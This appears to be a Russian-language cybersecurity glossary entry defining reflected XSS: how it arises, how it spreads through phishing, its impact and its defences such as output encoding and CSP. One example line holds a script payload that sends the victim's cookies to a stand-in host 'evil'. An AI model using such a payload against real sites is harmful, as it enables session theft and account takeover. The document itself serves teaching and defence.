Отражённый XSS
Что такое Отражённый XSS?
Отражённый XSSНепостоянный XSS, при котором подконтрольный атакующему ввод сразу отражается в ответе и исполняется в браузере жертвы.
Отражённый XSS (непостоянный, Type-1) возникает, когда веб-приложение принимает данные из HTTP-запроса — обычно из параметра URL или поля формы — и без должного кодирования вывода возвращает их в ответе. Атака требует, чтобы жертва перешла по подготовленной ссылке, поэтому распространяется через фишинг, вредоносную рекламу или мессенджеры. Успешная эксплуатация позволяет похитить сессионные cookie, совершить действия от имени пользователя или перерасти в полный захват учётной записи. Защита включает контекстно-зависимое HTML-кодирование, строгую Content Security Policy и фреймворки с автоматическим экранированием шаблонов.
● Примеры
- 01
https://example.com/search?q=<script>document.location='https://evil/?c='+document.cookie</script>
- 02
Страница ошибки, которая без санитизации вставляет параметр 'message' в DOM.
● Частые вопросы
Что такое Отражённый XSS?
Непостоянный XSS, при котором подконтрольный атакующему ввод сразу отражается в ответе и исполняется в браузере жертвы. Относится к категории Атаки и угрозы в кибербезопасности.
Что означает Отражённый XSS?
Непостоянный XSS, при котором подконтрольный атакующему ввод сразу отражается в ответе и исполняется в браузере жертвы.
Как работает Отражённый XSS?
Отражённый XSS (непостоянный, Type-1) возникает, когда веб-приложение принимает данные из HTTP-запроса — обычно из параметра URL или поля формы — и без должного кодирования вывода возвращает их в ответе. Атака требует, чтобы жертва перешла по подготовленной ссылке, поэтому распространяется через фишинг, вредоносную рекламу или мессенджеры. Успешная эксплуатация позволяет похитить сессионные cookie, совершить действия от имени пользователя или перерасти в полный захват учётной записи. Защита включает контекстно-зависимое HTML-кодирование, строгую Content Security Policy и фреймворки с автоматическим экранированием шаблонов.
Как защититься от Отражённый XSS?
Защита от Отражённый XSS обычно сочетает технические меры и операционные практики, как описано в определении выше.
Какие есть другие названия Отражённый XSS?
Распространённые альтернативные названия: Непостоянный XSS, XSS типа 1.
● Связанные термины
- attacks№ 240
Межсайтовый скриптинг (XSS)
Веб-уязвимость, позволяющая злоумышленнику внедрять вредоносные скрипты на страницы, просматриваемые другими пользователями, и выполнять их в браузере жертвы под источником сайта.
- attacks№ 1107
Хранимый XSS
Постоянная межсайтовая скриптинг-уязвимость: вредоносный скрипт сохраняется на сервере и выполняется в браузере каждого посетителя.
- attacks№ 347
DOM-XSS
Разновидность XSS, при которой внедрение и выполнение целиком происходят в браузере: клиентский JavaScript записывает недоверенные данные в опасный DOM-приёмник.
- appsec№ 214
Политика безопасности контента (CSP)
HTTP-заголовок ответа, указывающий браузеру, какие источники скриптов, стилей, фреймов и других ресурсов допустимы, что снижает последствия XSS и инъекций данных.
- attacks№ 821
Фишинг
Атака с применением социальной инженерии, при которой злоумышленник выдаёт себя за доверенную сторону, чтобы заставить жертву раскрыть учётные данные, перевести деньги или запустить вредоносное ПО.
- appsec№ 773
Кодирование вывода
Преобразование недоверенных данных в безопасную для конкретного контекста вывода (HTML, JavaScript, URL, SQL, shell) форму, чтобы они не вырвались и не выполнились как код.
● См. также
- № 104Слепой XSS